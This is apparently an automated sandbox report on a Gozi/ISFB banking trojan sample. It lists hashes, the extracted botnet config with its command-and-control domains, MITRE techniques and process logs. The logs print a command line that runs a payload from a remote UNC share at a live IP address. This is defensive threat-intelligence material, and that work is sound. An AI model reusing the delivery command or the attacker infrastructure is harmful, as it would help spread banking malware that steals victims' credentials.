gozi | 31ce65f830e52f5b6d7e6c266d7841e11662e71d6715d5211776ebb91beb3ec4

Analysis

max time kernel
158s
max time network
170s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
29-09-2023 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31ce65f830e52f5b6d7e6c266d7841e11662e71d6715d5211776ebb91beb3ec4_JC.url
Size

192B
MD5

91b01df174309ed2c53f214b38a3c817
SHA1

be006917a3451c90e81fb2778920de08e610d8d7
SHA256

31ce65f830e52f5b6d7e6c266d7841e11662e71d6715d5211776ebb91beb3ec4
SHA512

406d21df8b67083df3d70c3971feb506ee12903c33e3d03cd07e423ae1726dfffc6759d0f7da49f99a72f4044252dffa6107f5980effaa81279e5d909ec9e047

Score

10^/10

gozi 5050 banker dave isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

netsecurez.com

whofoxy.com

mimemoa.com

ntcgo.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral2/memory/3924-0-0x0000000001180000-0x000000000118C000-memory.dmp	dave

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

rundll32.exe

description	pid	process	target process
PID 4496 wrote to memory of 3924	4496	rundll32.exe	Client.exe
PID 4496 wrote to memory of 3924	4496	rundll32.exe	Client.exe
PID 4496 wrote to memory of 3924	4496	rundll32.exe	Client.exe

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\31ce65f830e52f5b6d7e6c266d7841e11662e71d6715d5211776ebb91beb3ec4_JC.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4496

\??\UNC\62.173.146.13\Scarica\Client.exe
"\\62.173.146.13\Scarica\Client.exe"
2⤵
PID:3924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3924-0-0x0000000001180000-0x000000000118C000-memory.dmp

Filesize
48KB

Download
memory/3924-1-0x0000000001190000-0x000000000119F000-memory.dmp

Filesize
60KB

Download
memory/3924-5-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/3924-11-0x0000000001210000-0x000000000121D000-memory.dmp

Filesize
52KB

Download